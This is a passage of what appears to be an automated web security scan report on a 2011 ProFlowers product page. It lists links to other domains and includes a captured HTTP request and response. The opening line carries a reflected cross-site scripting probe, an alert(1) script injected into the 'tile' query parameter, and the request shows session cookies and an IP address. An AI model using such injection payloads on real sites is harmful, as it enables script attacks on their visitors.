href="http://www.berries.com/?tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&amp;Ref=HomeNoRef" style="display:inline-block;height:61px;width:89px;"><img class="footerLogo_SHB" height=61px width=89px class="footerLogo_SHB" height="61px" width="89px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Gourmet hand-dipped berries, cookies and cakes." style="border-width:0px;" /></a>
...[SNIP]...
<br /><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
horized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.* http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script><!--ooend--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>

<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script>
   <script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
       <img src="http://link.mercent.com/image.ashx?merchantID=ProFlowers" style="display: none;">
   </noscript>
...[SNIP]...
</script>

       
       <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/instantservicechat.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</span>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/certona/resxclsa.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
16.19. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/The-Ultimate-Office-Plant-30003767

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253APBS%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FThe-Ultimate-Office-Plant-30003767%25253Fviewpos%25253D6%252526trackingpgroup%25253DP%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:27 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:12:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:12:27 GMT
Content-Length: 139819


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
<p>
   1) Enable Javascript. To find out how: <A href="https://www.google.com/support/adsense/bin/answer.py?answer=12654" target="_blank">click here</a>
...[SNIP]...
</title>
<link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_common.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_brandfonts.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_productdetail.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/pfc_lockdown.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/deliverycalendarcustom.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' /><link href='http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/stylesheets/deliverycalendarcustom_pfc.css?siteversionnumber=2011.05.07.2' rel='stylesheet' type='text/css' />
       <meta id="_metaDescription" name="Description" content="Send flowers and gifts including The Ultimate Office Plant from ProFlowers.com. Flowers and gifts are available for any holiday or occasion.
...[SNIP]...
<div>
   
           
                           <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/url.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.min.js"></script>


<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/productdetails.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<input type="hidden" name="productDetailBody$_hdQS" id="productDetailBody__hdQS" />
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsetselectionsimple.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucpersonalizationselection.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/externalproducts.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<div id="innerContainer">
           <link rel="shortcut icon" href="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/favicon.ico"/> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-1.3.2.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<a border="0" rel="nofollow" href="http://www.proflowers.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:120px;"><img height=31px width=120px height="31px" width="120px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<a border="0" rel="nofollow" href="http://www.proflowers.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PF_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="proPlantsLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.proplants.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:121px;"><img height=31px width=121px height="31px" width="121px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.proplants.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PP_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="redEnvelopeLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.redenvelope.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:145px;"><img height=31px width=145px height="31px" width="145px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.redenvelope.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/RED_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="personalCreationLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.personalcreations.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:170px;"><img height=31px width=170px height="31px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.personalcreations.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/PC_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="cherryMoonFarmsLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:170px;"><img height=31px width=170px height="31px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.cherrymoonfarms.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/CMF_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<li id="berriesLink" class="ourBrandsLi"> <a border="0" rel="nofollow" href="http://www.berries.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:31px;width:130px;"><img height=31px width=130px height="31px" width="130px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<div class="displayMoreInfo"> <a border="0" rel="nofollow" href="http://www.berries.com/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef" target="_blank" style="display:inline-block;height:58px;width:165px;"><img height=58px width=165px height="58px" width="165px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/SB_dropdown.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<a id="productDetailBody_ctl09__homeLink" border="0" title="Go to ProFlowers Homepage" href="http://www.proflowers.com/?tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="PFLogo" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="ProFlowers Delivery - Send Flowers, Gifts, and Plants" style="border-width:0px;" /></a>
...[SNIP]...
<li><a class="headerLink" href="http://www.bridesign.com" target="_blank">Wedding</a>
...[SNIP]...
<div class="rushDeliveryBox StandardSize">Need it <a id="productDetailBody_ctl09_ctl91__repeater_ctl00__pcHyperLink" rel="nofollow" href="http://www.floristexpress.net?refcode=XSD&amp;RefPage=PFC_PRODUCT-30003767" target="_blank">Today</a>
...[SNIP]...
<a href="http://www.proflowers.com/radio/default.aspx?tile=hmpg_podA&amp;Ref=HomeNoRef&amp;how=home"><img class="RadioIcon_Control" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/TransparentPixel.gif" alt="ProFlowers on the Radio" style="border-width:0px;" /></a>
...[SNIP]...
<div style="margin:0px 0 5 0;"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/topnav.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</a> <a class="Lckdwn3_Nav_PFC_Mothers_Show" href="http://www.floristexpress.net?pfc=1&amp;refcode=MDN&amp;LinkLocation=NavBar">Mother's Day</a>
...[SNIP]...
<li class="Lckdwn3_Nav_PFC_Occasion_Show"><a class="mothersDay" href="http://www.floristexpress.net?pfc=1&amp;refcode=OMD&amp;LinkLocation=NavBar">Mother's Day - 5/8</a>
...[SNIP]...
<li><a rel="nofollow" class="floristDelivery" href="http://www.floristexpress.net?refcode=PFC&amp;LinkLocation=NavBar">Local Florist Delivery</a>
...[SNIP]...
<li style="border-bottom:none;"><a class="wedding" href="http://www.bridesign.com" target="_blank">Wedding Flowers</a>
...[SNIP]...
<li class="Lckdwn3_Nav_PFC_Flowers_Hide"><a rel="nofollow" class="floristDelivery" href="http://www.floristexpress.net?refcode=pfc&amp;LinkLocation=NavBar">Florist Delivery</a>
...[SNIP]...
<li class="Lckdwn3_Nav_PFC_Flowers_Show"><a rel="nofollow" class="floristDelivery" href="http://www.floristexpress.net?pfc=1&amp;refcode=FMD&amp;LinkLocation=NavBar">Florist Delivery</a>
...[SNIP]...
<div class="searchBarBottom"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/commonjs.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucproductsearchinput.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
Body_ctl09_ctl117_submit2" prvdid="productsearchlink" rel="nofollow" type="image" href="http://www.proflowers.com/ProductSearch.aspx?Ref=HomeNoRef" style="display:inline-block;height:18px;width:48px;"><img class="sch_smallGoBottom sch_smallGoBottomAlt" height="18px" width="48px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" style="border-width:0px;" /></a>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
<div class="ProductInfoImage">
                           <img id="productDetailBody_productImage" class="productimagedimension" border="0" prvdid="productImage" RenderDivWhenInvisible="true" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT8inspath_wdtpr09_l?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=300&amp;hei=350" style="height:350px;width:300px;border-width:0px;" />
                       </div>
...[SNIP]...
<div id="productDetailBody_FlynnMagazeeny_divPicture" class="magPicture"> <img id="productDetailBody_FlynnMagazeeny_imgPicture" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/NTR_PD_Body_PFC_FLN_50_67_ReadersDigest_TB.gif" style="border-width:0px;" /> </div>
...[SNIP]...
<div class="StepImage"><img id="productDetailBody_shUpgradesHeader_image" class="Step_1" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="StepImage"><img id="productDetailBody_shMainAccessorySelectionHeader_image" class="Step_2" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl00_ctl00_Pcimage1" class="invisibleImageHeader" prvdid="imageheader" NAME="Pcimage1" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-down.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td class="accessoryImageBorder" valign="top" style="background-color:#FFFFFF"><img id="productDetailBody_accMainAccSelection_productList_ctl00_ctl00__productImage" prvdid="productimage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT_8inwhpot_PC1795_SQ?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;hei=73" style="height:73px;border-width:0px;" /></td>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl00_ctl00_Pcimage2" class="invisibleImageFooter" prvdid="imagefooter" NAME="Pcimage2" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-up.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl01_ctl00_Pcimage1" class="invisibleImageHeader" prvdid="imageheader" NAME="Pcimage1" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-down.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td class="accessoryImageBorder" valign="top" style="background-color:#FFFFFF"><img id="productDetailBody_accMainAccSelection_productList_ctl01_ctl00__productImage" prvdid="productimage" class="selectedImage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/8inwoodtaper_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;hei=73" style="height:73px;border-width:0px;" /></td>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl01_ctl00_Pcimage2" class="invisibleImageFooter" prvdid="imagefooter" NAME="Pcimage2" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-up.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl02_ctl00_Pcimage1" class="invisibleImageHeader" prvdid="imageheader" NAME="Pcimage1" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-down.gif" style="border-width:0px;" /></td>
...[SNIP]...
<td class="accessoryImageBorder" valign="top" style="background-color:#FFFFFF"><img id="productDetailBody_accMainAccSelection_productList_ctl02_ctl00__productImage" prvdid="productimage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/8inwvnbskt_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;hei=73" style="height:73px;border-width:0px;" /></td>
...[SNIP]...
<td align="center"><img id="productDetailBody_accMainAccSelection_productList_ctl02_ctl00_Pcimage2" class="invisibleImageFooter" prvdid="imagefooter" NAME="Pcimage2" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/arrow-up.gif" style="border-width:0px;" /></td>
...[SNIP]...
<div class="StepImage"><img id="productDetailBody_shZipCodeHeader_image" class="Step_4" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="StepImage"><img id="productDetailBody_shDeliveryDateSelectionHeader_image" class="Step_3" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div id="productDetailBody_deliveryCalendar" prvdid="calendarparentcontrol"><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/ucdeliverycalendarcustom.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<li>
                           <a id="productDetailBody_deliveryCalendar_ctl18__dataList_ctl00__pcHyperLink" Class="Underlined" href="http://www.floristexpress.net/?pfc=1&amp;refcode=ORD&amp;RefPage=PFC_PRODUCT-30003767" target="_blank">Today</a>
...[SNIP]...
<li>
                           <a id="productDetailBody_deliveryCalendar_ctl18__dataList_ctl01__pcHyperLink" Class="Underlined" href="http://www.floristexpress.net?pfc=1&amp;refcode=ZSU&amp;RefPage=PFC_PRODUCT-30003767" target="_blank">Sunday</a>
...[SNIP]...
<td align="left" valign="top" style="width:28px;"><img id="productDetailBody_deliveryCalendar_Image1" class="calendar_button" prvdid="calendar_button" alt="" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/Siteimages/icon_Calendar_DeliveryTime.gif" src="" style="border-width:0px;margin-left:5px; cursor:pointer;" /></td>
...[SNIP]...
</div>

                           
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/jquery-ui-1.7.1.core_draggable.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/jquery/ui.dialog.min.js?siteversionnumber=2011.05.07.2"></script>
<script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/giftsmartoverlay.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
<li>
                   <a id="productDetailBody_ctl14__dataList_ctl00__pcHyperLink" href="http://www.floristexpress.net/?pfc=1&amp;refcode=ORD&amp;RefPage=PFC_PRODUCT-30003767" target="_blank">Today</a>
...[SNIP]...
<li>
                   <a id="productDetailBody_ctl14__dataList_ctl01__pcHyperLink" href="http://www.floristexpress.net?pfc=1&amp;refcode=ZSU&amp;RefPage=PFC_PRODUCT-30003767" target="_blank">Sunday</a>
...[SNIP]...
<div class="AccessoryImages">
       <img id="productDetailBody_accPreview_Repeater1_ctl00_ctl00__productImage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/summerchocolates08_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=50&amp;hei=50" style="height:50px;width:50px;border-width:0px;" />
<img id="productDetailBody_accPreview_Repeater1_ctl01_ctl00__productImage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/accgenblue09_tn?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=50&amp;hei=50" style="height:50px;width:50px;border-width:0px;" />
<img id="productDetailBody_accPreview_Repeater1_ctl02_ctl00__productImage" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/Mdaycard10_AC?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=50&amp;hei=50" style="height:50px;width:50px;border-width:0px;" />

   </div>
...[SNIP]...
3" href="http://products.proflowers.com/flowers/Deluxe-Hugs-and-Kisses-5519?viewpos=6&amp;trackingpgroup=YMA&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:100px;width:86px;"><img height="100px" width="86px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/MBQdlxhugskiss_rbyg11_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=86&amp;hei=100" alt="Deluxe Hugs and Kisses" style="border-width:0px;" /></a>
...[SNIP]...
href="http://products.proflowers.com/flowers/Mardi-Gras-Orchid-Garden-42864?viewpos=6&amp;trackingpgroup=YMA&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:100px;width:86px;"><img height="100px" width="86px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCbromgrdnblk07_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=86&amp;hei=100" alt="Mardi Gras Orchid Garden" style="border-width:0px;" /></a>
...[SNIP]...
ducts.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137?viewpos=6&amp;trackingpgroup=RecentlyViewed&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="display:inline-block;height:100px;width:86px;"><img height="100px" width="86px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PF_11_00000000M232_VA0606_W1_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=86&amp;hei=100" alt="Deluxe Mother...s Day Bouquet" style="border-width:0px;" /></a>
...[SNIP]...
<div id="PFCfooterRibbonImage"><img id="productDetailBody_PCImage1" class="Ribbon25Mil" text="25 Million Orders Shipped" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" style="border-width:0px;" /></div>
...[SNIP]...
orized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending. * http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
"text" value="Enter Your Email Here" id="productDetailBody_footer_emailInput" class="textBox" onclick="javascript:this.value=&#39;&#39;;" onkeypress="return CaptureEnterInEmailEntry(footerClientID)" /><img onclick="SetEmailEntryUrl()" class="sch_smallGo" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Sign Up for Email Savings" width="17" height="18" border="0" /></div>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.prvd.com/Careers_Overview.aspx">CAREERS</a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.providecommerce.com/privacy.aspx">PRIVACY POLICY</a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.providecommerce.com/terms.aspx">TERMS OF USE</a>
...[SNIP]...
</div><img class="shopOurBrandFamily" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" style="height:20px;width:181px;border-width:0px;" /> <br />
...[SNIP]...
